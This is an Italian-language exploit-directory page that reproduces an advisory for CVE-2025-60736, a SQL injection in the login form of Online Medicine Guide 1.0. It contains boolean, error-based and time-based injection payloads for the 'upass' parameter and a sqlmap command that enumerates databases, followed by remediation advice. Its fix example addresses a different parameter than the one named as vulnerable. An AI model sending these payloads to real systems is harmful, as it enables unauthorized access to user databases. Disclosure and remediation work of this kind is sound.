Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-60736 — code-projects Online Medicine Guide 1.0 è vulnerabile a SQL Injection | Kitploit
Strumenti/GitHubGitHub/nxvh1337/cve-2025-60736
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubnxvh1337/cve-2025-60736

CVE-2025-60736

code-projects Online Medicine Guide 1.0 è vulnerabile a SQL Injection

Vedi Repository
161 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-60736: Vulnerabilità di SQL Injection nella Guida Medica Online

Riepilogo Esecutivo

Questo documento descrive una vulnerabilità critica di SQL injection scoperta nell'applicazione web Guida Medica Online. La vulnerabilità consente un accesso non autorizzato al database e comporta rischi significativi per la sicurezza dell'applicazione e dei suoi utenti.

Sottomittente

  • Noah "nxvh" Heraud

1. Informazioni sul Prodotto

Prodotto Interessato

  • Nome del Prodotto: Guida Medica Online
  • Fornitore: Code Projects
  • Homepage del Fornitore: https://code-projects.org/online-medicine-guide-in-php-css-javascript-and-mysql-free-download/
  • Versione Interessata: v1.0
  • File Vulnerabile: /login.php
  • Tipo di Software: Applicazione Web (PHP/MySQL)

Dettagli Tecnici

  • Linguaggio di Programmazione: PHP
  • Database: MySQL
  • Frontend: CSS, JavaScript
  • Architettura: Stack LAMP/WAMP

2. Dettagli sulla Vulnerabilità

Classificazione della Vulnerabilità

  • ID CVE: CVE-2025-60736
  • Tipo di Vulnerabilità: SQL Injection
  • Gravità: Critica
  • Punteggio CVSS: 9.8 (Critica)
  • Vettore di Attacco: Rete
  • Complessità dell'Attacco: Bassa
  • Privilegi Richiesti: Nessuno
  • Interazione dell'Utente: Nessuna
  • Ambito: Modificato

Analisi della Causa Principale

La vulnerabilità deriva da una validazione e sanificazione insufficiente dell'input nel file /login.php. L'applicazione concatena direttamente l'input dell'utente dal parametro upass nelle query SQL senza una sanificazione adeguata o istruzioni preparate.

Causa Principale Tecnica:

  • Concatenazione diretta di stringhe nelle query SQL
  • Mancanza di validazione e sanificazione dell'input
  • Implementazione mancante di istruzioni preparate
  • Binding dei parametri insufficiente

3. Prova di Concetto

Posizione della Vulnerabilità

  • File: /login.php
  • Parametro: upass (POST)
  • Vettore di Attacco: Manipolazione della richiesta HTTP POST

Metodi di Sfruttamento

Metodo 1: SQL Injection Basata su Booleani

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' OR NOT 1852=1852-- iPRx

Metodo 1: SQL Injection Basata su Errori

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND EXTRACTVALUE(4672,CONCAT(0x5c,0x7176707071,(SELECT (ELT(4672=4672,1))),0x71717a7071))-- knKp

Metodo 2: SQL Injection Blind Basata sul Tempo

POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

uname=uLnf&upass=rZgo' AND (SELECT 2089 FROM (SELECT(SLEEP(5)))zUlY)-- mWfa

Test Automatici

La vulnerabilità è stata confermata utilizzando sqlmap:

sqlmap -u "http://localhost:8000/login.php" --data="uname=admin&upass=test" -p upass --batch --dbs

prova dello sfruttamento

4. Piano di Rimedio

Azioni Immediate

  1. Patch di Emergenza: Implementare la validazione dell'input per il parametro upass
  2. Monitoraggio del Database: Abilitare la registrazione completa per attività sospette
  3. Restrizione degli Accessi: Implementare il rate limiting e restrizioni basate su IP
  4. Audit di Sicurezza: Condurre una valutazione di sicurezza immediata

5. Rimedio Tecnico

Esempio di Correzione del Codice

Prima (Vulnerabile):

$query = "SELECT * FROM users WHERE username = '" . $_POST['uname'] . "'";

Dopo (Sicuro):

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$_POST['uname']]);

Implementazione delle Best Practice di Sicurezza

  1. Istruzioni Preparate: Utilizzare esclusivamente query parametrizzate
  2. Validazione dell'Input: Implementare la validazione basata su whitelist
  3. Codifica dell'Output: Codificare correttamente tutti i dati di output
  4. Gestione degli Errori: Implementare una gestione sicura degli errori senza divulgazione di informazioni
  5. Controlli di Accesso: Implementare autenticazione e autorizzazione adeguate

Versione del Documento: 1.0
Ultimo Aggiornamento: 03/10/2025 (gg/mm/aaaa)

Scarica lo strumento